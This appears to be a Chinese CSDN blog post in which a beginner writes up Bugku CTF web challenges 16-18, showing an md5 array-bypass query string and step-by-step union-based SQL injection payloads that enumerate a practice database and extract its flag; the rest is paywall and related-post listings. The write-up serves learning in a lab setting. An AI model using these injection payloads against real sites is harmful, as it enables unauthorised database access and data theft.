Bugku CTF Web 解题报告二(16-20)

最新推荐文章于 2024-07-20 17:12:48 发布
最新推荐文章于 2024-07-20 17:12:48 发布
阅读量350 收藏 1
点赞数
文章标签: python web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51090016/article/details/113098952
版权
本文是作者在Bugku CTF平台完成Web挑战16至20的解题报告,涉及SQL注入、加密解密、脚本编写等技巧。在Web 16中通过备份文件获取flag;Web 17利用SQL注入获取数据库信息并解密flag;Web 18尝试用Python脚本解决问题但未成功;Web 19理解响应头动态flag的概念;Web 20通过cookies欺骗获取源码并解密隐藏文件。
摘要由CSDN通过智能技术生成

Bugku Web 16-20

web 16 备份是个好习惯

打开链接长这样
在这里插入图片描述
让我这个菜鸡摸不着头脑。。。不过前面提示了备份,那就打开index.php.bak吧
在这里插入图片描述
下载打开
在这里插入图片描述
实在看不懂,不过根据下面评论区大佬的提示,这是要用?kekeyy1[]=[1]&kekeyy2[]=[2]绕过md5的加密(真的不懂,还是要多学),所以在后面加上?kekeyy1[]=[1]&kekeyy2[]=[2]后flag就出来了

??
这后面三个字是啥东西???

Web 17 成绩查询

点开后长这样👇

在这里插入图片描述
分别输入1 2 3查了下都是成绩单,输到4就没了。看着像是sql注入的题,因为我还是个菜鸡,刚了解sql注入,只好跟着大佬做。
按照大佬的做法,先进行post请求,一切正常

在这里插入图片描述
加单引号又不行了
在这里插入图片描述
加#又可以了
在这里插入图片描述
这样就可以知道有sql注入漏洞了(为什么啊?我还是不太清楚,有没有大佬解答一下)
然后尝试获取列数,因为123都有了,所以试试4或者更高
构造id=1’ order by 4#,正常
在这里插入图片描述
继续构造id=1’ order by 5#,没了
在这里插入图片描述
所以只有4列

然后尝试联合查询(都是按照大佬的过程来的,还不知道为什么这么做)
具体做法是id=0’ union select 1,2,3,4#
在这里插入图片描述
然后又开始猜解数据库名, 数据库的用户,数据库的版本
具体做法是id=0’ union select 12345,database(),user(),version()#在这里插入图片描述

根据数据库skctf_flag去查询表名
具体做法:id=0’ union select 12345,(select group_concat(table_name) from information_schema.tables where table_schema=database()),user(),version()#
在这里插入图片描述
这个select group_concat(table_name) from information_schema.tables where table_schema=database(),好像是一个用来查询表名的固定格式

上一步得到了表名fl4g和sc,flag应该藏在fl4g里面

根据fl4g表去查询字段名(列名):id=0’ union select 12345,(select group_concat(column_name) from information_schema.columns where table_name=‘fl4g’),user(),version()# (有点迷糊)

再尝试获取字段(列)中的数据:**id=0’ union select 12345,(select group_concat(skctf_flag) from fl4g),user(),version()#**就获得flag了

参考的大佬,感谢大佬的wp。

Web 18 秋名山车神

打开长这样

最低0.47元/天 解锁文章
Vayn3
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Bugku CTF Web 解题报告(一)
qq_51090016的博客
01-24 974
Web11-20题 刚接触ctf的菜鸡,突发奇想写博客,想记录一下自己的写题过程。至于前面十题。。。我舍不得bugku的金币再启动一次场景,只好从11题开始。 Web 11 网站被黑了 我擦,网站被黑了??我一菜鸡哪会解这么高大上的题。打开题目一开,还搞得挺炫酷 这咋办?鼠标右键点不了,F12一看也没啥。我这也太菜了,只好看看大佬怎么做,原来是要用御剑,只好照葫芦画瓢 果然有了,访问下面这个看看 盲猜123456。。果然不对。只好想到用bp爆破。可我还不会爆破啊。。只好搜一下教程现学现用。 跟着大佬.
Bugku web19&秋名山车神
qq_46540840的博客
02-20 1561
Bugku web18秋名山车神文章目录前言一、知识补充1.正则表达试补充2.re 函数介绍web 19 解题过程三 .秋名山车神总结 文章目录 提示:这里可以添加系列文章的所有文章的目录,目录需要自己手动添加 例如:第一章 Python 机器学习入门之pandas的使用 提示:写完文章后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录文章目录前言一、知识补充1.正则表达试补充2.re 函数介绍web 19 解题过程三 .秋名山车神总结 前言 题目设计到正则表达试的运用 提示:以下
[bugku]-秋名山车神详解
weixin_52116519的博客
03-27 5174
解题 每一次刷新都不一样 post传参value 脚本1 import requests import re url = 'http://114.67.175.224:10053/' s = requests.Session() source = s.get(url) expression = re.search(r'(\d+[+\-*])+(\d+)', source.text).group() result = eval(expression) post = {'value': result} p
CTF | bugku | 秋名山车神
diemaoye6838的博客
09-07 1009
''' @Modify Time @Author ------------ ------- 2019/8/31 19:55 laoalo ''' import requests from lxml import etree ''' eval():将字符串str当成有效的表达式来求值并返回计算结果 ''' url =...
Bugku-秋名山车神
qq_51979295的博客
09-09 93
有的题比较坑,找不到啥信息就多刷新几次看看。
bugku-web-秋名山车神
qq_75121443的博客
04-01 244
因为老是对不上,所以观察了一下报文,发现PHPSESSID字段,在工具中添加留SESSID的机制。但是按照他的说法在两秒内多次进行页面刷新,这时的算式是相同的。以post请求,夹带value参数进行值的返回。现在就要找到,是以何种方式将答案反馈给他。每一次刷新后,得到的算式都不一样。然后在这两秒得到的页面中给予提示。以此开始构建Python工具。这样直接得到flag。
apachecn#apachecn-ctf-wiki#BugkuCTF-WEB解题记录-11-15_weixin_3069946
07-25
BugkuCTF WEB解题记录 11-15_weixin_30699463的博客-CSDN博客来源:
bugkuctf解题-WEB
05-04
本文主要针对"bugkuctf解题-WEB"这一主题,结合描述中的CTF菜鸟的解题经验分享,深入探讨Web解题的关键知识点。 首先,我们需要理解Web安全的基础概念。Web应用是基于HTTP/HTTPS协议的,其安全性主要取决于服务器端...
bugkuctf解题-杂项
05-04
bugku writeup,杂项解题writeup,根据网上的writeup自行解题后整理的日记,与大家分享,大家有新方法的也可以评论中告诉我,共同进步。——CTF菜鸟敬上。
爬虫笔记-Bugku秋名山老司机(入门)
12-21
记一次python爬虫笔记 题目:bugku-秋名山老司机 题目要求:两秒内提交一道很长的计算题答案,并且式子每次刷新都会变动 如: 多刷新几次可见题目提示,需要用post传入值,变量名为value 创建py文件,导入 requests 库和 re 库 并且创建一个会话对象,用它发送一个get请求 # requests库用于发送请求 # re库用于匹配正则表达式 import requests import re # requests.session() 维持会话 s = requests.session() r = s.get("http://192.168.4.243:1035/")
BugKu 2021 CTF AWD 排位赛 真题 S2 AWD排位赛-7.zip
12-07
【标题】"BugKu 2021 CTF AWD 排位赛 真题 S2 AWD排位赛-7.zip" 指的是2021年BugKu网络安全平台举办的AWD(Attack-Defend,攻防)CTF(Capture The Flag,夺旗)排位赛的实战题目,其中的"7"可能代表该赛事的第七个...
bugku ctf misc wp2.pdf
07-05
bugku ctf misc wp2.pdf
bugku 秋名山车神
m0_62709637的博客
08-05 1105
bugku 秋名山车神
BUGKU_CTF WEB 20题writeup
热门推荐
单核CPU的小朋友的博客
10-20 4万+
首先知道该页面存在sql注入漏洞。 先判断是否存在注入点。发现是单引号闭合注入。 通过页面回显信息判断当前列数 判断页面中可以回显的点 爆库名 使用命令:0’ union select table_name,2,3,4 from information_schema.tables where table_schema=‘skctf_flag’#爆表名 使用命令‘:0’ union sele...
对md5加密的绕过
qq_43457125的博客
08-27 1072
if(md5(key1)==md5(key1) == md5(key1)==md5(key2) && $key1 !== $key2){ echo $flag.”取得flag”; 如果md5加密的值一样而未加密的值不同,就输出flag. 有两种方法绕过: 1,md5()函数无法处理数组,如果传入的为数组,会返回NULL,所以两个数组经过加密后得到的都是NULL,也就是相等的。 ht...
BugkuCTF WEB解题记录 16-20
aap49042的博客
08-09 502
写了一部分的web题,算是把它最基础的一部分做了一遍,以后的几天将持续更新BugkuCTF WEB部分的题解,为了不影响阅读,所以每五道题的题解以一篇文章的形式发表,感谢大家一直以来的支持和理解,共勉~~~ 网站被黑 题目链接http://120.24.86.145:8002/webshell/ 打开网页是一个被人给黑掉的网页 我们试过很多种方法,但是依旧没有头绪。 ...
使用Python的Turtle库绘制动态风车
最新发布
爱写代码的小朋友
07-20 422
python绘制风车
CTF Web题理论基础篇-第课:工具集与php弱类型
在《002-CTF web题理论基础篇-第课理论基础.pdf》和《002-CTF web题理论基础篇-第课理论基础》中,我们学习了关于CTF网页题型的理论基础知识。本文总结了这些知识,并提供了一些相关的工具集和理论基础内容。 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值